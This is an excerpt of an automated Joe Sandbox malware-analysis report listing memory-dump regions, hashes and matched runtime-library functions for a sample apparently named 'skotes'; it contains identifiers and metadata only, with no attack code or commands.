                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __alloca_probe_16__freea
                                                                                                                                                                • String ID: P\X
                                                                                                                                                                • API String ID: 1635606685-3762502716
                                                                                                                                                                • Opcode ID: 231e0e76dfc6cba74486ec17ffd4de611f12c721f578d1809005eb439ead478b
                                                                                                                                                                • Instruction ID: 7e6c07edbc0f34df8e8450ccdaa83cf3f81d1b2849670020337b0ccb2c61b782
                                                                                                                                                                • Opcode Fuzzy Hash: 231e0e76dfc6cba74486ec17ffd4de611f12c721f578d1809005eb439ead478b
                                                                                                                                                                • Instruction Fuzzy Hash: FC81A072D00249ABDF209EA48881FEE7BF5DF49314F1941EEE845B7281E775CC408BA1
                                                                                                                                                                APIs
                                                                                                                                                                • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 00BB1B57
                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00BB1B66
                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00BB1C2A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: std::invalid_argument::invalid_argument$Concurrency::details::FreeIdleProcessorResetRoot::Virtual
                                                                                                                                                                • String ID: pContext$switchState
                                                                                                                                                                • API String ID: 2656283622-2660820399
                                                                                                                                                                • Opcode ID: 23916decb8f549166b1bcf012794d4629d5e17570c4d016a215df636ea11c84c
                                                                                                                                                                • Instruction ID: 85301709b904956bbf106849ca88843421c55035b26f213cd364b5d78c86229d
                                                                                                                                                                • Opcode Fuzzy Hash: 23916decb8f549166b1bcf012794d4629d5e17570c4d016a215df636ea11c84c
                                                                                                                                                                • Instruction Fuzzy Hash: 10319235A00214ABCF14EF68C8A1AFDB7F5EF44314F6049E5E911AB291EBB0ED01CA90
                                                                                                                                                                APIs
                                                                                                                                                                • FindSITargetTypeInstance.LIBVCRUNTIME ref: 00BB4E6D
                                                                                                                                                                • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00BB4E86
                                                                                                                                                                • PMDtoOffset.LIBCMT ref: 00BB4EAC
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FindInstanceTargetType$Offset
                                                                                                                                                                • String ID: Bad dynamic_cast!
                                                                                                                                                                • API String ID: 1467055271-2956939130
                                                                                                                                                                • Opcode ID: 99a24401ed846e0dc56f65af627e140f00123e8e3ea08f628b35e3be7e9f80f1
                                                                                                                                                                • Instruction ID: 04842aba444446c23421b6b49beb11864c7cfe22b2bd3028a5501899a7f43277
                                                                                                                                                                • Opcode Fuzzy Hash: 99a24401ed846e0dc56f65af627e140f00123e8e3ea08f628b35e3be7e9f80f1
                                                                                                                                                                • Instruction Fuzzy Hash: F021C772A04605AFCF18DF68DD46EFA77E8FB44720B1041E9F91597282EBB1ED0086A1
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _wcsrchr
                                                                                                                                                                • String ID: .bat$.cmd$.com$.exe
                                                                                                                                                                • API String ID: 1752292252-4019086052
                                                                                                                                                                • Opcode ID: 32d1ae13d8e30e28e7a55df59b0979b0bea8a93b9e006ba0e7d986433cea7c2e
                                                                                                                                                                • Instruction ID: ec2103d65db1676e13c1001baedc8fb0aa10519d0435e10599cfe266333fe671
                                                                                                                                                                • Opcode Fuzzy Hash: 32d1ae13d8e30e28e7a55df59b0979b0bea8a93b9e006ba0e7d986433cea7c2e
                                                                                                                                                                • Instruction Fuzzy Hash: 440166277486222B661450189D02FF667C8CBD2BB4B2500ABFC14F76C1EFC4DC4361A4
                                                                                                                                                                APIs
                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00B9FB06
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                                                                                                                                                                • String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
                                                                                                                                                                • API String ID: 348560076-465693683
